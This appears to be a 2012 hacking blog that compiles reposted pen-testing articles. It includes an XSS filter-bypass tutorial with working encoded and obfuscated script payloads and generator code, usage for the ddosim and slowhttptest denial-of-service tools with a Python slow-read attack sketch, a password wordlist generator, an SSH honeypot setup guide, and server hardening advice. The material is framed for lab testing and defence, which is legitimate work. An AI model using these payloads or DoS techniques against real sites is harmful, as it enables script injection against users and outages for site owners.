Jan 13, 2012

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing

Sometimes website owners use XSS filters (a WAF) to protect against XSS vulnerabilities. For example, if you submit <script>alert("hi")</script>, the filter escapes the " (quote) character, so the script gets mangled into something like
<script>alert(>xss detected<)</script>
Now this script won't run. Likewise, filters use different types of filtering methods to protect against XSS. In such cases we can use some tricks to bypass the filter, and that is what I am going to cover here.

1.Bypassing magic_quotes_gpc

The magic_quotes_gpc=ON option is a PHP setting (configured in the php.ini file) that automatically escapes every ' (single quote), " (double quote) and \ with a backslash.
For example:
<script>alert("hi");</script> will be filtered into <script>alert(\"hi\");</script>, so the script won't work any more.

This is a well-known filtering method, but we can easily bypass this filter by using ASCII character codes instead.
For example, alert("hi"); can be converted to
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
so the payload becomes <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59))</script>. String.fromCharCode() is a JavaScript function that converts ASCII values back into characters, and eval() executes the resulting string. Since the payload no longer contains any " (double quote) or ' (single quote), the filter has nothing to escape, and the script runs successfully.

How to convert to ASCII values?

There are some online sites that convert text to ASCII codes, but I suggest using the Hackbar Mozilla add-on.

After installing the Hackbar add-on, press F9. A small bar will open above the URL bar; click XSS -> String.fromCharCode().

A small window will pop up. Enter the code, for instance alert("Hi"), and click the OK button. Now we have the output.

Copy the output, wrap it in eval() inside <script></script> tags, and insert it into the vulnerable site.

For eg: 
hxxp://vulnerable-site/search?q=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59))</script>
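If you prefer to script the conversion instead of using Hackbar or an online converter, a short Python helper like the one below produces the same String.fromCharCode() payload (the helper name is purely illustrative); wrap its output in eval() as shown above:

# Build a String.fromCharCode() payload from a JavaScript snippet,
# mirroring what the Hackbar XSS menu does. Helper name is illustrative.
def to_charcode(js):
    codes = ", ".join(str(ord(c)) for c in js)
    return "String.fromCharCode(%s)" % codes

print(to_charcode('alert("hi");'))
# String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)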

2.HEX Encoding

We can encode the whole script as hex so that it can't be filtered.
For example, <script>alert("Hi");</script> converted to hex is:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Now put the code in the vulnerable site request.
For ex:
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Converting to HEX:
This site will convert text to hex code: http://centricle.com/tools/ascii-hex/
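If you would rather not rely on an online converter, a couple of lines of Python (function name illustrative) produce the same percent-encoded string:

# Percent-encode every character of the payload, as in the example above.
def hex_encode(payload):
    return "".join("%%%02x" % ord(c) for c in payload)

print(hex_encode('<script>alert("Hi");</script>'))
# %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e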

3.Bypassing using Obfuscation

Some website admins put script and alert on a restricted-word list, so whenever you input these keywords the filter removes them and returns an error message like "you are not allowed to search this". This can sometimes be bypassed by changing the case of the keywords (obfuscation).
For eg:
<ScRipt>ALeRt("hi");</sCRipT>

This bypass technique rarely works, but it is worth a try.

4. Closing Tag

Sometimes putting "> at the beginning of the payload will work.

"><script>alert("Hi");</script>

This closes the previously opened tag and opens our script tag.
Example:
hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>
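To see why this works, suppose (purely as an illustration) that the search term is reflected inside an attribute such as <input type="text" value="...">. The injected "> closes the attribute and the input tag, and the rest of the payload becomes new markup:

<input type="text" value=""><script>alert("Hi");</script>">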

Source: http://www.breakthesecurity.com/2011/12/bypassing-xss-filters-advanced-xss.html



ddosim v0.2 (Application Layer DDOS Simulator)

Hack websites by using ddosim v0.2 (Application Layer DDOS Simulator)

DDOSIM simulates several zombie hosts (with random IP addresses) that create full TCP connections to the target server. After completing the connection, DDOSIM starts the conversation with the listening application (e.g. an HTTP server). It should be used only in a laboratory environment to test the capacity of the target server to handle application-specific DDoS attacks.
Features
  • HTTP DDoS with valid requests
  • HTTP DDoS with invalid requests (similar to a DC++ attack)
  • SMTP DDoS
  • TCP connection flood on random port
In order to simulate such an attack in a lab environment, we need to set up an isolated test network between the attacker and the victim machine.
On the victim machine ddosim creates full TCP connections – which are only simulated connections on the attacker side.
There are a lot of options that make the tool  quite flexible:
Usage: ./ddosim
-d IP                   Target IP address
-p PORT            Target port
[-k NET]             Source IP from class C network (ex. 10.4.4.0)
[-i IFNAME]      Output interface name
[-c COUNT]       Number of connections to establish
[-w DELAY]       Delay (in milliseconds) between SYN packets
[-r TYPE]             Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
[-t NRTHREADS]   Number of threads to use when sending packets (default 1)
[-n]                       Do not spoof source address (use local address)
[-v]                       Verbose mode (slower)
[-h]                       Print this help message
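For example, a run against a lab server might look like the following (the target address, source network, interface and counts are purely illustrative):

./ddosim -d 192.168.1.2 -p 80 -k 10.4.4.0 -i eth0 -c 5000 -w 10 -r HTTP_VALID -t 2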

Source: http://hackingtricks.in/2012/01/hack-websites-by-using-ddosim-v0-2-application-layer-ddos-simulator-2.html



Jan 11, 2012

Kojoney SSH Honeypot, installation (CentOS) and configuration

 It is a low interaction honeypot that emulates the SSH service, and it’s written in Python like Kippo.  
1. First of all, since we’ll still want to be able to connect to our own machine, we must change the default SSH port 22 to something else:

vi /etc/ssh/sshd_config
 
You need to uncomment the "#Port 22" line and change "22" to whatever you want (take note of it), let's say 2222, so that the line reads Port 2222.

Restart the ssh server for the change to take effect:
/etc/init.d/sshd restart
 
At this stage you might want to logout of the system and connect again using the new port.

2. Let’s update the system and install required software:
yum update
 
Kojoney requires the following packages that can be installed through yum:
yum install gcc python python-devel
 
3. Download Kojoney itself:
cd /tmp
wget http://dfn.dl.sourceforge.net/project/kojoney/kojoney-0.0.4.2.tar.gz
tar -xvf kojoney-0.0.4.2.tar.gz
 
4. (OPTIONAL) The Iran Honeynet Project has created some updated packages for Kojoney that improve its geolocation feature and add new sections to the report file. It is worth installing them:
cd /tmp
wget http://www.honeynet.ir/software/kojoney-update/TwisteConch-0.6.0.tar.gz
wget http://www.honeynet.ir/software/kojoney-update/IP-Country-2.27.tar.gz
wget http://www.honeynet.ir/software/kojoney-update/Geography-Countries-2009041301.tar.gz
wget http://www.honeynet.ir/software/kojoney-update/kojreport
/bin/cp -vf /tmp/TwisteConch-0.6.0.tar.gz /tmp/kojoney/libs/
/bin/cp -vf /tmp/kojreport /tmp/kojoney/reports/
rm -rfv /tmp/kojoney/reports/ip_country/*
/bin/cp -vf /tmp/IP-Country-2.27.tar.gz /tmp/kojoney/reports/ip_country/
/bin/cp -vf /tmp/Geography-Countries-2009041301.tar.gz /tmp/kojoney/reports/ip_country/
 
The above files are also stored here for backup purposes: kojoney-update-files
5. Let’s install Kojoney and run it:
cd /tmp/kojoney
sh INSTALL.sh
 
I got an error here because the script wasn't able to locate the man directory. Fortunately it asks for it, so if required type the following: /usr/share/man/man1 (the "1" is not a typo).
echo "/etc/init.d/kojoney start" >> /etc/rc.local
/etc/init.d/kojoney start
 
You can check that everything is working alright by using
ps aux | grep kojoney
 
where you should see something like:
root  1573  0.0  1.4  14904  7748 ?  S  Jan09  0:33 python /usr/bin/kojoneyd
 
and also:
netstat -antp
 
where you should see something like this:
Proto Recv-Q Send-Q Local Address  Foreign Address  State   PID/Program name
tcp        0      0  0.0.0.0:22     0.0.0.0:*       LISTEN   1573/python
 
6. Where is what? Kojoney itself is installed at “/usr/share/kojoney/” by default. You can go there to have a look at its source files. The log file it creates is located at “/var/log/honeypot.log”. Kojoney already has a built-in list of common username and password combinations, stored at “/etc/kojoney/fake_users”. If somebody enters a combo found in this file, he’s got access.

7. There is a script distributed with it to make log parsing and statistics display easy. It is called kojreport and you can test it like this:
/usr/share/kojoney/kojreport /var/log/honeypot.log 0 0 1 > /tmp/report.txt
cat /tmp/report.txt
 
8. Kojoney has some of the same problems as Kippo: the responses to various commands are hardcoded, and you might need to change them. You can alter the existing ones or create your own as well.
There are specifically two files you need to pay attention to. Both of them are located in the base directory (/usr/share/kojoney/) and are called coret_fake.py and coret_honey.py.
“coret_fake.py” includes all the responses to various commands. I would suggest changing at least the following: FAKE_SSH_SERVER_VERSION, FAKE_OS (your own, or uncomment another from the list), FAKE_SHELL and FAKE_W.

The second file, “coret_honey.py”, is used when you want to add responses for new commands. You first define your response constant in “coret_fake.py” and then add it to “coret_honey.py”. For example, if I were to create a response for the “uptime” command:
a) I would write something like:
FAKE_UPTIME = " 02:32:28 up 1 day, 21:20,  1 user,  load average: 0.00, 0.00, 0.06"
into “coret_fake.py” and

b) I would add it to “coret_honey.py” file (lines 6 & 7 below):
if uname_re.match(data):
    transport.write(FAKE_OS)
elif ls_re.match(data):
    for line in FAKE_LS:
        transport.write(line + '\r\n')
elif data == "uptime":
    transport.write(FAKE_UPTIME)
And of course we need to restart the Kojoney service for the changes to take effect:
/etc/init.d/kojoney stop
/etc/init.d/kojoney start
 
9. Trying out Kojoney was not really in my plans (since I have invested time and effort in Kippo) until I found these two excellent resources that inspired me to give it a try: How To Set Up Kojoney SSH Honeypot On CentOS 5.5, Using and Extending Kojoney SSH Honeypot

Source: http://bruteforce.gr/kojoney-ssh-honeypot-installation-centos-and-configuration.html



Word List Generator

wlg: Word List Generator 
version: 0.5
coded by white_sheep

site: http://www.marcorondini.eu - http://www.ihteam.net
twitter: http://www.twitter.com/white__sheep
 
Option
 -h [ --help ]                         produce help message
 -v [ --version ]                      show version
 -r [ --credits ]                      show credits

 -e [ --extract ] arg                   set string to extract
 -c [ --compat ] arg                    set counter to compat

 -g [ --gen ]                           start wordlist generator

 -f [ --filename ] arg                  set filename 

 -C [ --charset ] arg (=ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvwxyz0123456789"_-.,:;!%&/()=?'^*+][@)
                                        set charset

 -o [ --using_word ]                    using word
 -w [ --start_word ] arg                set start word
 -W [ --end_word ] arg                  set end word

 -n [ --using_index ]                   using index
 -i [ --start_int ] arg (=0)            set start counter
 -I [ --end_int ] arg (=0)              set end counter

 -l [ --using_length ]                  using length
 -m [ --min_length ] arg (=0)           set min word length
 -M [ --max_length ] arg (=0)           set max word length 
 
extract function: return iteration number 

wlg -e ciao
15669092

compat function: return string about iteration number

wlg -c 15669092
ciao
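Conceptually, extract and compat look like two sides of the same mapping: a word is treated as a number written in the charset's "base". The Python sketch below illustrates the idea with a reduced charset; it is not wlg's actual code, and its numbers will only match wlg's if the charset and ordering are identical:

# Illustration of a word <-> iteration-number mapping (bijective base-N).
# The charset here is illustrative, not wlg's default.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"

def extract(word):
    # word -> iteration number (conceptually like `wlg -e`)
    n = 0
    for ch in word:
        n = n * len(CHARSET) + CHARSET.index(ch) + 1
    return n

def compat(n):
    # iteration number -> word (conceptually like `wlg -c`)
    chars = []
    while n > 0:
        n, rem = divmod(n - 1, len(CHARSET))
        chars.append(CHARSET[rem])
    return "".join(reversed(chars))

print(extract("ciao"))          # an iteration number
print(compat(extract("ciao")))  # ciao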

gen function: generate wordlist
    • using word index
        wlg -g -o -w ciao ( infinite wordlist creation )
        wlg -g -o -w ciao -W ciaoc ( wordlist between ciao and ciaoc )
    • using iteration index
        wlg -g -n -i 10000000000000000000 ( infinite wordlist creation )
        wlg -g -n -i 100 -I 123123123123( wordlist between 100 and 123123123123 iteration number )
    • using word length
        wlg -g -l -m 1 ( infinite wordlist creation )
        wlg -g -l -m 3 -M 8 ( wordlist with min length 3 and max length 8 )
Using file for output 
    wlg -g -l -m 1 -f wl.txt

Set charset
    wlg -g -l -m 1 -C 0123456789 -f wl.txt  

Source: https://github.com/whitesheep/wlg


Jan 10, 2012

Slowhttptest - Application Layer DoS attack simulator

SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks.
It implements the most common low-bandwidth Application Layer DoS attacks, such as slowloris, Slow HTTP POST, and the Slow Read attack (based on the TCP persist timer exploit), which drain the concurrent connection pool, as well as the Apache Range Header attack, which causes very significant memory and CPU usage on the server.
Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool sends partial HTTP requests, trying to get a denial of service from the target HTTP server.
The Slow Read DoS attack targets the same resources as slowloris and slow POST, but instead of prolonging the request, it sends a legitimate HTTP request and reads the response slowly.

Details

The attack exploits the fact that most modern web servers do not limit the connection duration as long as some data flow is going on. Since a TCP connection can be prolonged virtually forever with zero or minimal data flow by manipulating the TCP receive window size, it is possible to exhaust the application's concurrent connection pool. The possibility of prolonging a TCP connection is described in several vulnerability reports: MS09-048, CVE-2008-4609, CVE-2009-1925, CVE-2009-1926.
Prerequisites for a successful attack are:
  • The victim server should accept connections with an advertised window smaller than the server socket's send buffer; the smaller, the better.
  • The attacker needs to request a resource that doesn't fit into the server's socket send buffer, which is usually between 64K and 128K. To fill up the server socket's send buffer for sure, consider using HTTP pipelining (the -k argument of slowhttptest).
slowhttptest controls the incoming data rate by manipulating the receive buffer size through the SO_RCVBUF socket option and by varying the rate at which the application reads from it. Note that different operating systems might behave differently: for example, OSX uses the value we set SO_RCVBUF to in the initial SYN packet, while Linux systems double this value (to allow space for bookkeeping overhead) when it is set using setsockopt. The minimum doubled value for Linux systems is 256 or the first value of /proc/sys/net/ipv4/tcp_rmem, whichever is larger. Also, changing the receive buffer size on OSX doesn't work when connecting to localhost.
For SSL connections, slow reading from the receive buffer engages after the SSL handshake has finished. However, as the initial window size is smaller than usual, the handshake might require more TCP packets and take longer than usual.
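To make the mechanism concrete, here is a minimal Python sketch of the slow-read idea, meant only for a lab server you own; the host, path and buffer/timing values are illustrative, and this is not slowhttptest's actual implementation:

# Minimal slow-read sketch: shrink SO_RCVBUF before connecting so a tiny
# window is advertised, then drain the response a few bytes at a time.
import socket
import time

HOST, PORT, PATH = "lab-server.local", 80, "/big-resource.bin"  # illustrative

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set the receive buffer before connect() so the small window is advertised
# early on; the kernel may round or double the value we ask for.
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 256)
s.connect((HOST, PORT))
s.sendall(("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n" % (PATH, HOST)).encode())

# Read 32 bytes every 5 seconds; the server's send buffer stays full and the
# connection is held open far longer than a normal download would take.
while True:
    chunk = s.recv(32)
    if not chunk:
        break
    time.sleep(5)

s.close()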

Example

Actual example of usage: 

./slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://myseceureserver/resources/index.html -p 3

-X starts the Slow Read test with 1000 connections, created at a rate of 200 connections per second. The initial SYN packet for every connection has a random advertised window size between 512 and 1024, and the application reads 32 bytes from each socket's receive buffer every 5 seconds. To multiply the overall response size, we use a pipeline factor of 3 to request the same resource 3 times per socket. The probe connection considers the server DoSed if no response is received within 3 seconds.

Let me remind you what slowloris and slow POST are aiming to do: a Web server keeps its active connections in a relatively small concurrent connection pool, and the above-mentioned attacks try to tie up all the connections in that pool with slow requests, thus causing the server to reject legitimate requests.

The idea of the attack I implemented is pretty simple: Bypass policies that filter slow-deciding customers, send a legitimate HTTP request and read the response slowly, aiming to keep as many connections as possible active. Sounds too easy to be true, right?

Crafting a Slow Read


Let’s start with a simple case, and send a legitimate HTTP request for a resource without reading the server’s response from the kernel receive buffer.
We craft a request like the following:

GET /img/delivery.png HTTP/1.1
Host: victim
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) Presto/2.9.168 Version/11.50
Referer: http://code.google.com/p/slowhttptest/

And the server replies with something like this:

HTTP/1.1 200 OK
Date: Mon, 19 Dec 2011 00:12:28 GMT
Server: Apache
Last-Modified: Thu, 08 Dec 2011 15:29:54 GMT
Accept-Ranges: bytes
Content-Length: 24523
Content-Type: image/png
?PNG

The simplified tcpdump output looks like this:

09:06:02.088947 IP attacker.63643 > victim.http: Flags [S], seq 3550589098, win 65535, options [mss 1460,nop,wscale 1,nop,nop,TS val 796586772 ecr 0,sackOK,eol], length 0
09:06:02.460622 IP victim.http > attacker.63643: Flags [S.], seq 1257718537, ack 3550589099, win 5792, options [mss 1460,sackOK,TS val 595199695 ecr 796586772,nop,wscale 6], length 0
09:06:02.460682 IP attacker.63643 > victim.http: Flags [.], ack 1, win 33304, length 0
09:06:02.460705 IP attacker.63643 > victim.http: Flags [P.], seq 1:219, ack 1, win 33304, length 218 
09:06:02.750771 IP victim.http > attacker.63643: Flags [.], ack 219, win 108, length 0
09:06:02.762162 IP victim.http > attacker.63643: Flags [.], seq 1:1449, ack 219, win 108, length 1448
09:06:02.762766 IP victim.http > attacker.63643: Flags [.], seq 1449:2897, ack 219, win 108, length 1448
09:06:02.762799 IP attacker.63643 > victim.http: Flags [.], ack 2897, win 31856, length 0
...
...
09:06:03.611022 IP victim.http > attacker.63643: Flags [P.], seq 24617:24738, ack 219, win 108, length 121 
09:06:03.611072 IP attacker.63643 > victim.http: Flags [.], ack 24738, win 20935, length 0
09:06:07.757014 IP victim.http > attacker.63643: Flags [F.], seq 24738, ack 219, win 108, length 0
09:06:07.757085 IP attacker.63643 > victim.http: Flags [.], ack 24739, win 20935, length 0
09:09:54.891068 IP attacker.63864 > victim.http: Flags [S], seq 2051163643, win 65535, length 0

For those who don't feel like reading tcpdump's output: we established a connection; sent the request; received the response in several 1448-byte TCP packets, because of the Maximum Segment Size the underlying communication channel supports; and finally, 5 seconds later, we received the TCP packet with the FIN flag.

Everything seems normal and expected. The server handed the data to its kernel-level send buffer, and the TCP/IP stack took care of the rest. At the client, even though the application had not yet read from its kernel-level receive buffer, all the transactions were completed at the network layer.

What if we try to make the client’s receive buffer very small?

We sent the same HTTP request and the server produced the same HTTP response, but tcpdump showed much more interesting results:

13:37:48.371939 IP attacker.64939 > victim.http: Flags [S], seq 1545687125, win 28, options [mss 1460,nop,wscale 0,nop,nop,TS val 803763521 ecr 0,sackOK,eol], length 0
13:37:48.597488 IP victim.http > attacker.64939: Flags [S.], seq 3546812065, ack 1545687126, win 5792, options [mss 1460,sackOK,TS val 611508957 ecr 803763521,nop,wscale 6], length 0
13:37:48.597542 IP attacker.64939 > victim.http: Flags [.], ack 1, win 28, options [nop,nop,TS val 803763742 ecr 611508957], length 0
13:37:48.597574 IP attacker.64939 > victim.http: Flags [P.], seq 1:236, ack 1, win 28, length 235
13:37:48.820346 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0
13:37:49.896830 IP victim.http > attacker.64939: Flags [P.], seq 1:29, ack 236, win 98, length 28
13:37:49.896901 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:37:51.119826 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:37:51.119889 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:37:55.221629 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:37:55.221649 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:37:59.529502 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:37:59.529573 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:38:07.799075 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:38:07.799142 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:38:24.122070 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:38:24.122133 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:38:56.867099 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:38:56.867157 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:40:01.518180 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:40:01.518222 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:42:01.708150 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:42:01.708210 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:44:01.891431 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:44:01.891502 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:46:02.071285 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:46:02.071347 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:48:02.252999 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:48:02.253074 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0,  length 0
13:50:02.436965 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0
13:50:02.437010 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0

In the initial SYN packet, the client advertised its receive window size as 28 bytes. The server sends the first 28 bytes to the client and that’s it! The server keeps polling the client for space available at progressive intervals until it reaches a 2-minute interval, and then keeps polling at that interval, but keeps receiving win 0.

This is already promising: if we can prolong the connection lifetime for several minutes, it's not that bad, and we can have more fun with thousands of connections! But the fun did not happen. Let's see why: once the server receives the request and generates the response, it writes the data to the socket, which is supposed to deliver it to the end user. If the data fits into the server socket's send buffer, the server hands the entire response to the kernel and forgets about it. That's what happened in our last test.

What if we make the server keep polling the socket for write readiness? We get exactly what we wanted: Denial of Service.

Let’s summarize the prerequisites for the DoS:
  • We need to know the server’s send buffer size and then define a smaller-sized client receive buffer. TCP doesn’t advertise the server’s send buffer size, but we can assume that it is the default value, which is usually between 65Kb and 128Kb. There’s normally no need to have a send buffer larger than that.
  • We need to make the server generate a response that is larger than the send buffer. With reports indicating the Average Web Page Approaches 1MB, that should be fairly easy. Load the main page of the victim’s Web site in your favorite WebKit-based browser like Chrome or Safari and pick the largest resource in Web Inspector.
http://dum21w3618van.cloudfront.net/images/slowread/fig1.png


If there are no sufficiently large resources on the server, but it supports HTTP pipelining, which many Web servers do, then we can multiply the size of the response as much as we need to fill up the server's send buffer by re-requesting the same resource several times over the same connection.
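Assuming the same image as in the earlier example, a pipelined request with factor 3 is simply the request written into the connection three times back to back, before any response is read:

GET /img/delivery.png HTTP/1.1
Host: victim

GET /img/delivery.png HTTP/1.1
Host: victim

GET /img/delivery.png HTTP/1.1
Host: victim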

For example, here’s a screenshot of mod_status on Apache under attack:

http://dum21w3618van.cloudfront.net/images/slowread/fig2.jpg

As you can see, all connections are in the WRITE state with 0 idle workers.

Installation

The tool is distributed as a portable package, so just download the latest tarball from the Downloads section, extract it, then configure, compile, and install:
$ tar -xzvf slowhttptest-x.x.tar.gz

$ cd slowhttptest-x.x

$ ./configure --prefix=PREFIX

$ make

$ sudo make install
Here PREFIX must be replaced with the absolute path where the slowhttptest tool should be installed.
You need libssl-dev installed to compile the tool successfully. Most systems already have it.

The full list of configurable options is the following:
-a start                   start value of ranges-specifier for range header test
-b bytes                   limit of range-specifier for range header test
-c number of connections   limited to 1024
-H, B, R or X              specify to slow down in headers section or in message body, -R enables range test, -X enables slow read test
-g                         generate statistics in CSV and HTML formats, pattern is slow_xxx.csv/html, where xxx is the time and date
-i seconds                 interval between follow up data in seconds, per connection
-k pipeline factor         number of times to repeat the request in the same connection for slow read test, if server supports HTTP pipelining
-l seconds                 test duration in seconds
-n seconds                 interval between read operations from receive buffer
-o file                    custom output file path and/or name, effective if -g is specified
-p seconds                 timeout to wait for HTTP response on probe connection, after which server is considered inaccessible
-r connections per second  connection rate
-s bytes                   value of Content-Length header, if -B specified
-t verb                    custom verb to use
-u URL                     target URL, the same format you type in browser, e.g. https://host[:port]/
-v level                   verbosity level of log, 0-4
-w bytes                   start of range the advertised window size would be picked from
-x bytes                   max length of follow up data
-y bytes                   end of range the advertised window size would be picked from
-z bytes                   bytes to read from receive buffer with single read() operation
Example of usage in slow message body mode:
./slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Example of usage in slowloris mode:
./slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

Output

Depending on the verbosity level, the output can be as simple as a heartbeat message generated every 5 seconds showing the status of connections (verbosity level 1), or a full traffic dump (verbosity level 4).
The -g option generates both a CSV file and an interactive HTML page based on Google Chart Tools.
A sample screenshot of the generated HTML page is available on the project page.

How to Protect Against Slow HTTP Attacks

Slow HTTP attacks are denial-of-service (DoS) attacks in which the attacker sends HTTP requests in pieces slowly, one at a time to a Web server. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a DoS. Slow HTTP attacks are easy to execute because they require only minimal resources from the attacker.

In this article, I describe several simple steps to protect against slow HTTP attacks and to make the attacks more difficult to execute.


Protection Strategies


To protect your Web server against slow HTTP attacks, I recommend the following:
  • Reject / drop connections with HTTP methods (verbs) not supported by the URL.
  • Limit the header and message body to a minimal reasonable length. Set tighter URL-specific limits as appropriate for every resource that accepts a message body.
  • Set an absolute connection timeout, if possible. Of course, if the timeout is too short, you risk dropping legitimate slow connections; and if it’s too long, you don’t get any protection from attacks. I recommend a timeout value based on your connection length statistics, e.g. a timeout slightly greater than median lifetime of connections should satisfy most of the legitimate clients.
  • The backlog of pending connections allows the server to hold connections it's not ready to accept, which helps it withstand a larger slow HTTP attack and gives legitimate users a chance to be served under high load. However, a large backlog also prolongs the attack, since it queues all connection requests regardless of whether they're legitimate. If the server supports a backlog, I recommend making it reasonably large so that your HTTP server can handle a small attack.
  • Define the minimum incoming data rate, and drop connections that are slower than that rate. Care must be taken not to set the minimum too low, or you risk dropping legitimate connections.

Server-Specific Recommendations


Applying the above steps to the HTTP servers tested in the previous article indicates the following server-specific settings:

Apache

  • Using the <Limit> and <LimitExcept> directives to drop requests with methods not supported by the URL alone won’t help, because Apache waits for the entire request to complete before applying these directives. Therefore, use these parameters in conjunction with the LimitRequestFields, LimitRequestFieldSize, LimitRequestBody, LimitRequestLine, LimitXMLRequestBody directives as appropriate. For example, it is unlikely that your web app requires an 8190 byte header, or an unlimited body size, or 100 headers per request, as most default configurations have. 
  • Set reasonable TimeOut and KeepAliveTimeOut directive values. The default value of 300 seconds for TimeOut is overkill for most situations.
  • ListenBackLog’s default value of 511 could be increased, which is helpful when the server can’t accept connections fast enough.
  • Increase the MaxRequestWorkers directive to allow the server to handle the maximum number of simultaneous connections.
  • Adjust the AcceptFilter directive, which is supported on FreeBSD and Linux, and enables operating system specific optimizations for a listening socket by protocol type. For example, the httpready Accept Filter buffers entire HTTP requests at the kernel level.

A number of Apache modules are available to minimize the threat of slow HTTP attacks. For example, mod_reqtimeout’s RequestReadTimeout directive helps to control slow connections by setting timeout and minimum data rate for receiving requests.
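As a rough illustration (tune the values for your site and check the mod_reqtimeout documentation for your Apache version), such a directive looks something like:

RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500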

I also recommend switching apache2 to experimental Event MPM mode where available.  This uses a dedicated thread to handle the listening sockets and all sockets that are in a Keep Alive state, which means incomplete connections use fewer resources while being polled.

Nginx


lighttpd

  • Restrict request verbs using the $HTTP["request-method"] field in the configuration file for the core module (available since version 1.4.19).
  • Use server.max-request-size to limit the size of the entire request including headers.
  • Set server.max-read-idle to a reasonable minimum so that the server closes slow connections. No absolute connection timeout option was found.

IIS 6


IIS 7

  • Limit request attributes through the <RequestLimits> element, specifically the maxAllowedContentLength, maxQueryString, and maxUrl attributes.
  • Set <headerLimits> to configure the type and size of header your web server will accept.
  • Tune the connectionTimeout, headerWaitTimeout, and minBytesPerSecond attributes of the <limits> and <WebLimits> elements to minimize the impact of slow HTTP attacks.


Source: https://code.google.com/p/slowhttptest/


Howto: Beginning Web Pen Testing: ICMP Scans


Great post from Sketchymoose



Got the Hacme Shipping VM up and running, and the link I posted last post about the setup made life so much easier. In addition to the steps in the tutorial, make sure you also install the .NET Framework 2.0, which can be grabbed here. And there is a typo in the tutorial: if you need to access ColdFusion via the web browser yourself, go to:
 http://127.0.0.1/CFIDE/administrator/index.cfm
Oh, and make sure you have enough space on your VM; you can expand it via the command-line vdiskmanager. 15 GB should suffice; 8 GB is not enough (I found out the hard way).

So these next few posts will be about scans. I know, I know, scanning is so -boring- right?! However, what did I say before? If you do not understand the basics and the versatility of your toolkit, you are missing data. Also, it never looks good when someone asks "Why did you try that?" and your response is "Because it was the example in the book and I thought that was good enough." Sorry guys, but you gotta start at the beginning :) I also do not know who my audience is out there in the interwebs, so I figure I'll start small and work my way up to more fun things (it's always good for a refresher, right?)

Different operating systems respond to scans differently: where Windows XP says 'open', Windows 7 may say 'filtered'. The key is understanding the scan you are running, and then examining the results to determine what they mean. The way a machine responds to scan probes is also another way of determining the OS of the host you are scanning (also known as fingerprinting). That being said, I am not going to go through all the scans nmap has to offer, nor will I break each packet down to every bit and byte; try them on your own networks and see what works!
ICMP Scanning
ICMP stands for Internet Control Message Protocol. This is generally what you use on your internal network when troubleshooting connectivity problems. This is also why you should never allow ICMP responses to leave your network, as they help an attacker map your internal network. Let's look at a simple example of an ICMP Echo Request, the most common ICMP packet.

ICMP ECHO command
An ICMP Echo request packet is known as Type 8 and a reply is Type 0. This can be seen in the ICMP packet via Wireshark or any handy packet sniffer.

ICMP Request - Type 8 is highlighted


ICMP Reply - Type 0 is highlighted

